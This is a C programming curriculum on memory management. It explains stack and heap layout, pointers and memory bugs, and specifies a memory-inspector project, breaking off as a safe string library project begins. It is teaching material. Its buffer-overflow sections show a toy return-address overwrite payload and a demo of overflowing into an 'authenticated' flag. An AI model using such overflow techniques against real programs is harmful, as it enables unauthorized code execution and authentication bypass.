SPRINT 1 REAL WORLD PROJECTS
Sprint 1: Memory & Control - Real World Projects
Goal: Deeply understand memory management and control in C—what memory actually is, why it’s dangerous, how to master it, and why this knowledge is the foundation of all systems programming.
Project Overview Table
| # | Project | Core Topics Covered | Difficulty |
|—|———|———————|————|
| 1 | Memory Inspector Tool | Pointers & Addresses, Stack vs Heap Visualization, Memory Layout, %p Formatting, lldb Debugging | Intermediate |
| 2 | Safe String Library | C String Internals, Null Terminators, Buffer Overflow Prevention, Bounds Checking, Pointer Arithmetic | Intermediate |
| 3 | Memory Leak Detector | malloc/free Tracking, Memory Leaks, Double-Free Detection, Use-After-Free, Object Lifetime & Ownership | Intermediate |
| 4 | Arena Allocator | Bump Allocation, Custom Allocators, mmap System Call, Memory Alignment, O(1) Allocation/Bulk-Free | Intermediate |
| 5 | Exploit Lab (Buffer Overflow) | Buffer Overflow Exploitation, Stack Frame Layout, Return Address Overwriting, ASLR/Canaries/NX, Security Mitigations | Advanced |
—
Why Memory & Control Matters
In 1972, Dennis Ritchie created C at Bell Labs to rewrite Unix. His design choice was radical: give programmers direct access to memory addresses. No safety net. No garbage collector. Just raw power and raw responsibility.
That decision shaped the next 50 years of computing:
- The Linux kernel (30+ million lines of C) runs on 96.3% of the world’s top 1 million web servers
- Every major security vulnerability you’ve heard of—Heartbleed, Shellshock, the Morris Worm—exploited C memory bugs
- CVE statistics: ~70% of security vulnerabilities in Microsoft and Google products are memory safety issues
- The billion-dollar bugs: Buffer overflows alone have caused estimated damages in the tens of billions of dollars
Why does C remain dominant despite these dangers? Because understanding memory is understanding computing:
High-level abstraction What you think happens
↓
let x = [1, 2, 3] → "Create an array"
↓
Low-level reality What actually happens
↓
malloc(12) → Ask OS for 12 bytes at address 0x7f3a...
*(int*)ptr = 1 → Write 00000001 to bytes 0-3
*(int*)(ptr+4) = 2 → Write 00000002 to bytes 4-7
*(int*)(ptr+8) = 3 → Write 00000003 to bytes 8-11

Every Python list, every JavaScript object, every Rust Vec—underneath, it’s all pointers and bytes. Languages just hide this from you. C shows you the truth.
The Memory Hierarchy: What You’re Really Working With

When you write int x = 42;, you’re not just “storing a number”—you’re participating in this entire hierarchy. Understanding this is why C programmers can make software 10-100x faster than naive implementations.
Core Concept Analysis
The Big Picture: A Process’s Memory Layout
When your program runs, the operating system gives it a virtual address space. Here’s what it looks like:
High addresses (0xFFFFFFFF...)
┌────────────────────────────┐
│ Kernel Space │ ← You can't touch this
│ (OS code and data) │
├────────────────────────────┤ 0x7FFF...
│ │
│ Stack │ ← Local variables, return addresses
│ ↓ │ Grows DOWN toward lower addresses
│ │
│ (empty) │
│ │
│ ↑ │
│ Heap │ ← malloc'd memory
│ │ Grows UP toward higher addresses
├────────────────────────────┤
│ BSS │ ← Uninitialized global variables
├────────────────────────────┤
│ Data │ ← Initialized global variables
├────────────────────────────┤
│ Text │ ← Your compiled code (read-only)
└────────────────────────────┘
Low addresses (0x00000000...)

Every C program you write operates within this structure. Let’s break down each region:
1. The Stack: Automatic Memory Management
The stack is where local variables live. It’s called a “stack” because it works exactly like a stack of plates:
void foo() {
int a = 1; // Pushed onto stack
int b = 2; // Pushed onto stack
bar(); // bar's frame pushed on top
} // a and b automatically "popped" (destroyed)
Stack during foo():
┌─────────────────────┐ High addresses
│ Return address │ ← Where to go after foo() returns
├─────────────────────┤
│ Saved registers │ ← Previous function's state
├─────────────────────┤
│ int b = 2 │ ← Local variable
├─────────────────────┤
│ int a = 1 │ ← Local variable
├─────────────────────┤
│ ... │
└─────────────────────┘ Low addresses (stack grows down)

Key insight: The stack is fast (just move a pointer) but limited (~8MB default on Linux). It’s also ephemeral—when a function returns, its stack frame is gone. That’s why returning a pointer to a local variable is undefined behavior.
2. The Heap: Manual Memory Management
The heap is where malloc() gets memory. Unlike the stack, you control when memory is allocated and freed:
int* create_array(int size) {
int* arr = malloc(size * sizeof(int)); // Ask heap for memory
return arr; // Valid! Heap memory persists
} // But who frees it?
Heap layout (simplified):
┌────────────────────────────────────────────┐
│ Header │ User Data │ ← malloc(100)
│ 8 bytes│ 100 bytes │
├────────┼───────────────────────────────────┤
│ Header │ Free space (fragmented) │ ← Was freed
├────────┼───────────────────────────────────┤
│ Header │ User Data │ ← malloc(50)
│ 8 bytes│ 50 bytes │
└────────┴───────────────────────────────────┘

Key insight: Every malloc() adds metadata (size, in-use flag). That’s why free() knows how much to deallocate. Corrupt this metadata, and you corrupt the heap allocator itself.
3. Pointers: Just Numbers That Are Addresses
A pointer is not magic. It’s just a number that happens to be interpreted as a memory address:
int x = 42;
int* p = &x;
// What's actually happening:
// x lives at address 0x7ffeefbff4ac
// p contains the VALUE 0x7ffeefbff4ac
// *p means "go to that address and read the int there"
printf("Value of p: %p\n", (void*)p); // 0x7ffeefbff4ac
printf("Value of *p: %d\n", *p); // 42
printf("Value of x: %d\n", x); // 42
Pointer arithmetic follows type sizes:
int arr[3] = {10, 20, 30};
int* p = arr;
p + 1 // Not "address + 1 byte"
// It's "address + sizeof(int) bytes"
// So p + 1 points to arr[1], not some random byte
Pointer Arithmetic Visualization:
Memory Addresses and Values (int = 4 bytes):
Address: 0x1000 0x1004 0x1008 0x100C
┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐
Value: │ 10 │ │ 20 │ │ 30 │ │ (next) │
└──────────┘ └──────────┘ └──────────┘ └──────────┘
▲ ▲ ▲
│ │ │
p p+1 p+2
Key Insight: p + 1 moves by sizeof(int) = 4 bytes, NOT 1 byte!
If p were a char*:
Address: 0x1000 0x1001 0x1002 0x1003
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
Value: │ 'A' │ │ 'B' │ │ 'C' │ │ 'D' │
└─────┘ └─────┘ └─────┘ └─────┘
▲ ▲
│ │
p p+1
Now p + 1 moves by sizeof(char) = 1 byte

4. Memory Bugs: The Rogues Gallery
Every memory bug falls into a few categories. Understanding them is understanding why C is dangerous:
Buffer Overflow
char buffer[10];
strcpy(buffer, "This string is way too long!");
// Overwrites memory PAST the buffer
// Could overwrite return address → attacker controls execution
Buffer Overflow Stack Corruption - Step by Step:
STEP 1: Normal Stack Frame BEFORE strcpy
========================================
Function: vulnerable()
char buffer[10];
strcpy(buffer, "This string is way too long!");
Stack Layout:
High Addresses (grows DOWN)
┌──────────────────────────┐
│ Return Address │ ← 0x7fff5000 Where to go after function returns
│ (points to caller) │ (e.g., 0x400123)
├──────────────────────────┤
│ Saved Frame Pointer │ ← 0x7fff4ff8
├──────────────────────────┤
│ buffer[9] │ ← 0x7fff4ff0
│ buffer[8] │
│ buffer[7] │
│ buffer[6] │
│ buffer[5] │
│ buffer[4] │
│ buffer[3] │
│ buffer[2] │
│ buffer[1] │
│ buffer[0] │ ← 0x7fff4fe6 (buffer starts here)
├──────────────────────────┤
│ (other locals) │
└──────────────────────────┘
Low Addresses
STEP 2: During strcpy - Bytes Being Written
============================================
Source: "This string is way too long!\0" (30 bytes!)
Dest: buffer (only 10 bytes allocated!)
┌──────────────────────────┐
│ Return Address │ ← Will be OVERWRITTEN!
│ 0x400123 → 0x676E6F6C │ (becomes "long" in ASCII!)
├──────────────────────────┤
│ Saved Frame Pointer │ ← Will be OVERWRITTEN!
│ → 0x6F742079 │ (becomes "y to" in ASCII!)
├──────────────────────────┤
│ 'g' '!' '\0' [overflow] │ ← PAST END OF BUFFER
│ 'n' 'o' 'l' ' ' │ ← PAST END OF BUFFER
│ 'o' 't' ' ' 'y' │ ← PAST END OF BUFFER
│ 's' ' ' 'w' 'a' │
│ 'T' 'h' 'i' 's' │ ← buffer[0-9] (valid)
├──────────────────────────┤
STEP 3: After strcpy - CORRUPTED!
==================================
┌──────────────────────────┐
│ Return Address │
│ 0x676E6F6C ("long") │ ← CORRUPTED! Not a valid code address
├──────────────────────────┤
│ Saved Frame Pointer │
│ 0x6F742079 │ ← CORRUPTED!
├──────────────────────────┤
│ 'g' '!' '\0' │
│ 'n' 'o' 'l' ' ' │
│ 'o' 't' ' ' 'y' │
│ 's' ' ' 'w' 'a' │
│ 'T' 'h' 'i' 's' │
└──────────────────────────┘
STEP 4: When Function Returns - CRASH!
=======================================
CPU tries to:
1. Pop return address from stack → gets 0x676E6F6C
2. Jump to that address
3. 0x676E6F6C is NOT valid executable code!
4. SEGMENTATION FAULT!
With a carefully crafted exploit:
strcpy(buffer, "AAAAAAAAAA" + "\xef\xbe\xad\xde");
↑ 10 bytes ↑ Attacker's address
Return address becomes 0xdeadbeef → attacker controls execution!

Use-After-Free
int* p = malloc(sizeof(int));
*p = 42;
free(p);
// p still contains the old address, but memory is now "free"
*p = 100; // UNDEFINED! Memory might be reused
Memory Bug Lifecycle - Use-After-Free Timeline:
Timeline of a Use-After-Free Bug:
T=0: Allocation
┌──────────────────────┐
│ int* p = malloc(...) │──┐
└──────────────────────┘ │
▼
Heap: [p → 0x1000] → ┌─────────┐
│ 42 │ Status: VALID
└─────────┘
T=1: Use (OK)
┌────────┐
│ *p = 42│ ✓ Works fine
└────────┘
T=2: Free
┌──────────┐
│ free(p) │──┐
└──────────┘ │
▼
Heap: [p → 0x1000] → ┌─────────┐
│ 42 │ Status: FREED (memory returned to allocator)
└─────────┘
p is now a DANGLING POINTER!
T=3: Reuse (somewhere else in program)
┌────────────────────────────┐
│ char* s = malloc(4); │──┐
│ strcpy(s, "ABC"); │ │
└────────────────────────────┘ ▼
Heap: [s → 0x1000] → ┌─────────┐
[p → 0x1000] → │ "ABC" │ SAME ADDRESS REUSED!
└─────────┘
T=4: Use-After-Free BUG!
┌─────────┐
│ *p = 100│ ← Writing to freed memory!
└─────────┘
│
▼
Heap: [s → 0x1000] → ┌─────────┐
[p → 0x1000] → │ 100 │ CORRUPTED s's data!
└─────────┘
Result: Undefined behavior! Could:
- Silently corrupt other data (like above)
- Crash immediately
- Work fine (memory not yet reused) ← WORST: bug appears later!
- Security vulnerability (attacker controls what's at that address)

Double-Free
int* p = malloc(sizeof(int));
free(p);
free(p); // Heap allocator's metadata is now corrupted
// Next malloc might return garbage
Double-Free Heap Corruption:
How Double-Free Corrupts the Heap Allocator:
INITIAL STATE - Normal Heap:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=1 │ User Data (p points │
│ prev=NULL │ here) │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │ Other allocation │
└────────────────────────────────────────────────────┘
AFTER FIRST free(p) - Correct:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=0 │ Free block │ ← Added to free list
│ next_free → ... │ (available for │
│ prev_free → ... │ reuse) │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │ Other allocation │
└────────────────────────────────────────────────────┘
Free List: HEAD → [Block at p] → [Other free blocks] → NULL
AFTER SECOND free(p) - CORRUPTED:
┌────────────────────────────────────────────────────┐
│ Header: CORRUPTED! │ Double-freed block │
│ next_free → ITSELF │ ← Creates loop or │
│ prev_free → ??? │ invalid pointers │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │ Other allocation │
└────────────────────────────────────────────────────┘
Free List: HEAD → [Block at p] → [Block at p] → ∞ LOOP!
↓ ↑
└───────────────┘
CONSEQUENCES:
1. Free list is now circular or has invalid pointers
2. Next malloc() might:
- Return the same address twice → two pointers to same memory
- Crash when traversing corrupted free list
- Return garbage/invalid addresses
3. Heap metadata is corrupted → future mallocs are unpredictable
4. Security risk: Attacker can exploit to write arbitrary memory
Example of the damage:
int* a = malloc(16); // Might get address 0x1000
int* b = malloc(16); // Might ALSO get 0x1000! (same memory!)
*a = 42;
*b = 100;
printf("%d\n", *a); // Prints 100! (a and b are aliased)

Memory Leak
void leak() {
int* p = malloc(1000);
// Function returns without free(p)
// Those 1000 bytes are now unreachable but still allocated
}
// Call leak() 1000 times → 1MB of leaked memory
5. Why C Doesn’t Protect You
Other languages prevent these bugs through:
| Language | Protection Mechanism |
|---|---|
| Java/Go | Garbage collector (no manual free) |
| Rust | Ownership system (compile-time checks) |
| Python | Reference counting + GC |
| JavaScript | GC + no pointer arithmetic |
C gives you none of this. Why?
- Performance: Every safety check costs cycles
- Control: Sometimes you NEED to do “unsafe” things (OS kernels, device drivers)
- Simplicity: C’s model maps directly to hardware
- History: C was designed when computers had 64KB of RAM
The tradeoff: C trusts you completely. With that trust comes power—and responsibility.
Tools for Seeing Memory
You can’t master what you can’t observe. These tools make memory visible:
1. lldb/gdb: The Debugger
$ lldb ./my_program
(lldb) breakpoint set --name main
(lldb) run
(lldb) frame variable # Show local variables
(lldb) memory read &x # Show raw bytes at address of x
(lldb) register read # Show CPU registers
2. AddressSanitizer: The Bug Finder
$ clang -fsanitize=address -g my_program.c -o my_program
$ ./my_program
# If there's a memory bug, you get a detailed report:
# ==12345==ERROR: AddressSanitizer: heap-use-after-free
# READ of size 4 at 0x602000000010
3. Valgrind: The Memory Profiler
$ valgrind --leak-check=full ./my_program
# Reports all memory leaks, invalid reads/writes
# Slower but catches more bugs
4. printf debugging (sometimes the best tool)
printf("x is at %p, value = %d\n", (void*)&x, x);
printf("p is at %p, points to %p, *p = %d\n", (void*)&p, (void*)p, *p);
Concept Summary Table
| Concept Cluster | What You Need to Internalize |
|---|---|
| Memory as bytes | Memory is just numbered boxes. Everything is bytes with interpretation layered on top. |
| The stack | Automatic, fast, limited. Local variables live here. Grows down. LIFO. |
| The heap | Manual, flexible, fragmentation-prone. malloc/free. You control lifetime. |
| Pointers as addresses | A pointer is just a number that happens to be an address. Arithmetic follows type sizes. |
| Ownership & lifetime | Who “owns” memory? When does it become invalid? Why can’t the compiler always know? |
| Failure modes | Buffer overflow, use-after-free, double-free, memory leak—these aren’t abstract, they’re observable. |
| Tooling | lldb and sanitizers show you what’s actually happening vs. what you think is happening. |
Deep Dive Reading by Concept
This section maps each concept from above to specific book chapters for deeper understanding. Read these before or alongside the projects to build strong mental models.
Memory Fundamentals (What Memory Actually Is)
| Concept | Book & Chapter |
|---|---|
| How data is represented in memory | Write Great Code, Volume 1 by Randall Hyde — Ch. 2: “Numeric Representation” & Ch. 4: “Floating-Point Representation” |
| Memory as numbered bytes | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 2: “Representing and Manipulating Information” (sections 2.1–2.2) |
| Virtual vs. physical memory | Operating Systems: Three Easy Pieces by Arpaci-Dusseau — Part II: “Virtualization” (Ch. 13-15: “Address Spaces”, “Memory API”, “Address Translation”) |
| How the CPU sees memory | Code: The Hidden Language of Computer Hardware and Software by Charles Petzold — Ch. 16: “An Assemblage of Memory” & Ch. 17: “Automation” |
The Stack (Automatic Memory)
| Concept | Book & Chapter |
|---|---|
| Function call mechanics | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 3.7: “Procedures” |
| Stack frames and layout | Low-Level Programming by Igor Zhirkov — Ch. 4: “Virtual Memory” & Ch. 5: “Compilation Pipeline” (section on calling conventions) |
| Why stack grows down | The Secret Life of Programs by Jonathan Steinhart — Ch. 5: “Where Am I?” (memory layout) |
| Recursion and stack overflow | C Primer Plus by Stephen Prata — Ch. 9: “Functions” (section on recursion) |
The Heap (Manual Memory)
| Concept | Book & Chapter |
|---|---|
| How malloc/free work | The C Programming Language by Kernighan & Ritchie — Ch. 8.7: “Example—A Storage Allocator” |
| Heap data structures | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 9.9: “Dynamic Memory Allocation” |
| Memory fragmentation | C Interfaces and Implementations by David Hanson — Ch. 5: “Arena” & Ch. 6: “Mem” |
| System calls for memory | The Linux Programming Interface by Michael Kerrisk — Ch. 7: “Memory Allocation” |
Pointers (The Heart of C)
| Concept | Book & Chapter |
|---|---|
| What pointers really are | Understanding and Using C Pointers by Richard Reese — Ch. 1: “Introduction” & Ch. 2: “Dynamic Memory Management” |
| Pointer arithmetic | The C Programming Language by Kernighan & Ritchie — Ch. 5: “Pointers and Arrays” |
| Pointers and arrays relationship | Expert C Programming by Peter van der Linden — Ch. 4: “The Shocking Truth: C Arrays and Pointers Are NOT the Same!” |
| Function pointers | C Primer Plus by Stephen Prata — Ch. 14: “Structures and Other Data Forms” (section on function pointers) |
| Void pointers and casting | 21st Century C by Ben Klemens — Ch. 6: “Your Pal the Pointer” |
Memory Safety & Vulnerabilities
| Concept | Book & Chapter |
|---|---|
| Buffer overflow mechanics | Hacking: The Art of Exploitation by Jon Erickson — Ch. 3: “Exploitation” (0x300 sections) |
| Why C doesn’t protect you | Effective C by Robert Seacord — Ch. 2: “Objects, Functions, and Types” & Ch. 7: “Characters and Strings” |
| Common C security pitfalls | Secure Coding in C and C++ by Robert Seacord — Ch. 2: “Strings” & Ch. 4: “Dynamic Memory Management” |
| Use-after-free and dangling pointers | Understanding and Using C Pointers by Richard Reese — Ch. 2: “Dynamic Memory Management” (section on dangling pointers) |
Memory Debugging & Tools
| Concept | Book & Chapter |
|---|---|
| Using debuggers effectively | The Art of Debugging with GDB, DDD, and Eclipse by Matloff & Salzman — Ch. 1-3: Basics of GDB |
| Understanding memory with lldb | Low-Level Programming by Igor Zhirkov — Ch. 6: “Interrupts and System Calls” (debugger sections) |
| Reading assembly to understand memory | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 3: “Machine-Level Representation of Programs” (focus on 3.1–3.5) |
Process Memory Layout
| Concept | Book & Chapter |
|---|---|
| Complete process memory map | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 9: “Virtual Memory” (especially 9.7-9.8) |
| ELF format and sections | Practical Binary Analysis by Dennis Andriesse — Ch. 2: “The ELF Format” |
| How programs are loaded | The Linux Programming Interface by Michael Kerrisk — Ch. 6: “Processes” |
Essential Reading Order
For maximum comprehension, read in this order:
- Foundation (Week 1):
- Computer Systems Ch. 2 (data representation)
- The C Programming Language Ch. 5 (pointers)
- Understanding and Using C Pointers Ch. 1-2 (pointer mastery)
- Stack & Heap (Week 2):
- Computer Systems Ch. 3.7 (procedures/stack)
- Computer Systems Ch. 9.9 (dynamic allocation)
- The C Programming Language Ch. 8.7 (allocator example)
- Safety & Exploitation (Week 3):
- Effective C Ch. 7 (strings and safety)
- Hacking: The Art of Exploitation Ch. 3 (seeing bugs in action)
- Deep Understanding (Week 4+):
- Operating Systems: Three Easy Pieces Part II (virtual memory)
- C Interfaces and Implementations Ch. 5-6 (allocator design)
Project 1: Memory Inspector Tool
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Programming Language: C
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool”
- Difficulty: Level 2: Intermediate
- Knowledge Area: Memory Management / Systems Programming
- Software or Tool: Memory Profiler
- Main Book: “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron
What you’ll build: A command-line tool that visualizes the memory layout of C programs—showing stack frames, heap allocations, variable addresses, and how they change during execution.
Why it teaches memory & control: This forces you to see memory the way lldb sees it. You’ll print addresses, observe stack growth, watch heap fragmentation, and understand that “memory” is just a big array of bytes with conventions layered on top. By building something that displays memory, you have to truly understand what memory is.
Core challenges you’ll face:
- Printing addresses with
%pand understanding what they mean (maps to: what memory is) - Observing that stack addresses decrease as you go deeper (maps to: stack layout)
- Watching heap addresses and understanding
mallocreturn values (maps to: heap layout) - Creating a struct and dumping its raw bytes (maps to: bytes & interpretation)
- Demonstrating what happens when you access freed memory (maps to: use-after-free)
Key Concepts:
| Concept | Resource |
|———|———-|
| Pointer fundamentals | “Understanding and Using C Pointers” Ch. 1-2 - Richard Reese |
| Stack vs Heap visualization | LLDB Tutorial - memory read command |
| Address interpretation | PDR: LLDB Tutorial - Frame inspection |
Difficulty: Beginner Time estimate: Weekend Prerequisites: Basic C syntax, compiling with gcc/clang
Real World Outcome
When you run your memory inspector tool, you’ll see detailed, educational output showing exactly where variables live in memory and how the stack and heap are organized. Here are real examples of what your tool will produce:
Example 1: Stack vs Heap Visualization
$ ./memory_inspector
=== MEMORY INSPECTOR TOOL ===
[STACK VARIABLES]
Variable 'x' (int):
Address: 0x7ffeefbff4ac
Value: 42
Size: 4 bytes
Location: STACK (high address)
Variable 'y' (double):
Address: 0x7ffeefbff4a0
Value: 3.14159
Size: 8 bytes
Location: STACK (high address)
[HEAP ALLOCATIONS]
Pointer 'p' points to:
Address: 0x600000004000
Value: 100
Size: 4 bytes
Location: HEAP (low address)
Pointer 'arr' points to:
Address: 0x600000004010
Values: [1, 2, 3, 4, 5]
Size: 20 bytes (5 integers)
Location: HEAP (low address)
[MEMORY LAYOUT DIAGRAM]
High Addresses (Stack)
┌─────────────────────────────────┐
│ 0x7ffeefbff4ac: x = 42 │ ← Stack (automatic storage)
│ 0x7ffeefbff4a0: y = 3.14159 │
└─────────────────────────────────┘
... gap ...
┌─────────────────────────────────┐
│ 0x600000004000: *p = 100 │ ← Heap (dynamic allocation)
│ 0x600000004010: arr[0..4] │
└─────────────────────────────────┘
Low Addresses (Heap)
Stack grows DOWN (toward lower addresses)
Heap grows UP (toward higher addresses)
Example 2: Function Call Stack Frame Inspection
$ ./memory_inspector --show-frames
=== STACK FRAME VISUALIZATION ===
Calling sequence: main() → foo() → bar()
[In bar() - Current Frame]
Local variable 'z' at 0x7ffeefbff47c = 30
Stack pointer (approx): 0x7ffeefbff478
[In foo() - Previous Frame]
Local variable 'y' at 0x7ffeefbff49c = 20
Return address: 0x400685
Frame distance from bar: 32 bytes
[In main() - Base Frame]
Local variable 'x' at 0x7ffeefbff4bc = 10
Frame distance from foo: 32 bytes
ASCII Stack Layout:
┌────────────────────────────────┐ ← 0x7ffeefbff4c0 (main's frame top)
│ main(): int x = 10 │
│ Return address to OS │
├────────────────────────────────┤ ← 0x7ffeefbff4a0
│ foo(): int y = 20 │
│ Return address to main │
├────────────────────────────────┤ ← 0x7ffeefbff480
│ bar(): int z = 30 │ ← Current execution point
│ Return address to foo │
└────────────────────────────────┘ ← 0x7ffeefbff478 (stack pointer)
Notice: Stack addresses DECREASE as we go deeper into function calls!
Example 3: Memory Corruption Detection
$ ./memory_inspector --demo-corruption
=== BEFORE BUFFER OVERFLOW ===
Buffer location: 0x7ffeefbff490
Buffer contents: "HELLO"
Buffer size: 10 bytes
Target variable 'authenticated': 0x7ffeefbff49e
Value: 0 (FALSE)
Memory layout:
0x7ffeefbff490: [H][E][L][L][O][\0][ ][ ][ ][ ] ← buffer[10]
0x7ffeefbff49a: [ ][ ][ ][ ]
0x7ffeefbff49e: [00][00][00][00] ← authenticated (int)
=== AFTER BUFFER OVERFLOW ===
Wrote 14 bytes to 10-byte buffer!
Memory layout:
0x7ffeefbff490: [H][E][L][L][O][W][O][R][L][D] ← buffer[10] OVERFLOWED
0x7ffeefbff49a: [!][!][!][!] ← Overwrite started here!
0x7ffeefbff49e: [21][21][00][00] ← authenticated CORRUPTED!
Target variable 'authenticated': 0x7ffeefbff49e
Value: 8481 (TRUE - CORRUPTED!)
⚠️ WARNING: Buffer overflow detected!
Bytes written: 14
Buffer capacity: 10
Overflow: 4 bytes
Memory corruption: authenticated variable changed from 0 to 8481
Example 4: Raw Bytes and Endianness
$ ./memory_inspector --show-bytes
=== RAW BYTE INSPECTION ===
Integer: 0x12345678 (305419896 in decimal)
Address: 0x7ffeefbff4ac
Size: 4 bytes
Byte-by-byte breakdown (Little-Endian on x86-64):
Byte 0 at 0x7ffeefbff4ac: 0x78 (least significant)
Byte 1 at 0x7ffeefbff4ad: 0x56
Byte 2 at 0x7ffeefbff4ae: 0x34
Byte 3 at 0x7ffeefbff4af: 0x12 (most significant)
Memory visualization:
Lower Address Higher Address
↓ ↓
[78][56][34][12]
↑ ↑
LSB MSB
Note: On little-endian systems (x86/x64), bytes are stored
in reverse order - least significant byte first!
Struct padding demonstration:
struct Example {
char c; // 1 byte
// 3 bytes padding
int i; // 4 bytes
char d; // 1 byte
// 7 bytes padding
double d; // 8 bytes
} ex;
Address: 0x7ffeefbff490
Total size: 24 bytes (not 14!)
Memory layout:
0x7ffeefbff490: [c ][ ][ ][ ] ← char + 3 padding bytes
0x7ffeefbff494: [i i][i i] ← int (aligned to 4)
0x7ffeefbff498: [d ][ ][ ][ ] ← char + 3 padding
0x7ffeefbff49c: [ ][ ][ ][ ] ← 4 more padding bytes
0x7ffeefbff4a0: [d d d d d d d d] ← double (aligned to 8)
Wasted space: 10 bytes (41.7% padding!)
These outputs demonstrate that you’ve built a tool that makes the invisible visible - showing exactly how C represents data in memory, where variables live, and how memory corruption happens at the byte level.
Learning milestones:
- First milestone: You can explain why
&xandxare different, and what*pactually does - Second milestone: You can predict whether a variable is on stack or heap by looking at its address
- Final milestone: You instinctively think of memory as numbered bytes, not abstract “variables”
The Core Question You’re Answering
“What IS memory? Where do my variables actually live, and how can I see them?”
Before you write any code, sit with this question. Most developers have a vague sense of “variables” but can’t explain what that actually means at the hardware level. A variable is just a label for a location in a giant array of bytes.
Concepts You Must Understand First
Stop and research these before coding:
- Memory as Numbered Bytes
- What does it mean that memory is “just bytes”?
- How is an
intstored differently than achar? - What is the difference between a value and an address?
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 2 - Bryant & O’Hallaron
- The Address-of Operator (
&)- What does
&xactually return? - Why is this number different every time you run the program? (ASLR)
- What’s the relationship between
&xand*(&x)?
- What does
- Pointers as Numbers
- If a pointer is just a number, what makes it special?
- What does “dereferencing” mean in terms of hardware operations?
- Why is
int*different fromchar*if both are just addresses? - Book Reference: “Understanding and Using C Pointers” Ch. 1 - Richard Reese
- Stack vs Heap Layout
- Why do stack addresses go downward and heap addresses go upward?
- What is the “stack pointer”?
- Why is the stack fast and the heap slow?
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron
Questions to Guide Your Design
Before implementing, think through these:
- Displaying Addresses
- How do you print an address in C? (
%p) - What format is the address printed in? (Hexadecimal)
- What does a typical stack address look like vs a heap address?
- How do you print an address in C? (
- Visualizing Stack Frames
- How can you show that calling a function creates a new stack frame?
- If you call
foo()which callsbar(), how do their local variables relate in memory? - How do you demonstrate that returning from a function “destroys” its local variables?
- Observing Heap Allocations
- When you call
malloc(100), what address do you get? - If you call
malloc(100)twice, how far apart are the addresses? - What happens to those addresses after
free()?
- When you call
- Raw Byte Inspection
- How do you print the individual bytes of an integer?
- What’s the difference between big-endian and little-endian?
- How do you see padding bytes in a struct?
Thinking Exercise: Trace Memory by Hand
Before coding, trace this on paper:
void bar() {
int z = 30;
printf("z at %p\n", &z);
}
void foo() {
int y = 20;
printf("y at %p\n", &y);
bar();
}
int main() {
int x = 10;
printf("x at %p\n", &x);
foo();
int* heap = malloc(sizeof(int));
*heap = 100;
printf("heap at %p\n", heap);
free(heap);
}
Questions while tracing:
- Draw a diagram of the stack at the moment
bar()is executing - Which address is highest:
&x,&y, or&z? Why? - Where does the heap allocation fit in your diagram?
- What happens to
&zafterbar()returns?
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is the difference between
&xandx?” - “How can you tell if an address is on the stack or the heap?”
- “What happens to a local variable when a function returns?”
- “What is a pointer, really?”
- “Why does the stack grow downward on x86?”
- “What is ASLR and why does it exist?”
Hints in Layers (Only If Stuck)
Hint 1: Start with printf
Your first program should just print addresses: ```c int x = 10; printf("x is at address %p\n", (void*)&x); ``` Run it multiple times. Notice how the address changes (ASLR).Hint 2: Compare Stack Depths
Create nested functions and print addresses from each. You'll see addresses decreasing as you go deeper. This shows stack growth direction.Hint 3: Dump Raw Bytes
Cast any variable to `unsigned char*` and print each byte: ```c int x = 0x12345678; unsigned char* bytes = (unsigned char*)&x; for (int i = 0; i < sizeof(int); i++) { printf("Byte %d: 0x%02x\n", i, bytes[i]); } ``` You'll see endianness in action.Hint 4: Use lldb
Compile with `-g` and use lldb to verify your understanding: ``` lldb ./program breakpoint set --name main run frame variable memory read &x ```Books That Will Help
| Topic | Book | Chapter |
|---|---|---|
| What memory really is | “Computer Systems: A Programmer’s Perspective” | Ch. 2 |
| Pointers from first principles | “Understanding and Using C Pointers” | Ch. 1-2 |
| Stack and function calls | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7 |
| Seeing memory with debuggers | “The Art of Debugging with GDB, DDD, and Eclipse” | Ch. 1-3 |
| Process memory layout | “The Linux Programming Interface” | Ch. 6 |
Project 2: Safe String Library
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: Rust, Zig, C++
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 2: Intermediate (The Developer)
- Knowledge Area: Memory Safety, Systems Programming
- Software or Tool: GCC, Valgrind, AddressSanitizer
- Main Book: “The C Programming Language” - Kernighan & Ritchie
What you’ll build: A bounds-checked string library in C (safe_strlen, safe_strcpy, safe_strcat, safe_substr) that prevents buffer overflows by design.
Why it teaches memory & control: C strings are the perfect teacher for memory danger. Every function forces you to think: “Where does this string end? How big is the destination? What happens if I’m wrong?” By building safe versions, you must first understand exactly how the unsafe versions fail.
Core challenges you’ll face:
- Finding the null terminator by walking memory byte-by-byte (maps to: string representation)
- Preventing writes past buffer boundaries (maps to: buffer overflow)
- Understanding why
strcpy(dest, src)has no idea how bigdestis (maps to: why C doesn’t protect you) - Handling the case where source has no null terminator (maps to: undefined behavior is real)
- Pointer arithmetic to implement
substr(maps to: pointer arithmetic)
Key Concepts:
| Concept | Resource |
|———|———-|
| C string internals | “The C Programming Language” Ch. 5 - Kernighan & Ritchie |
| Why %s is dangerous | CWE-134: Uncontrolled Format String |
| Buffer overflow mechanics | “Understanding and Using C Pointers” Ch. 5 - Richard Reese |
Difficulty: Beginner-Intermediate Time estimate: Weekend Prerequisites: Project 1 or equivalent comfort with addresses
Real World Outcome
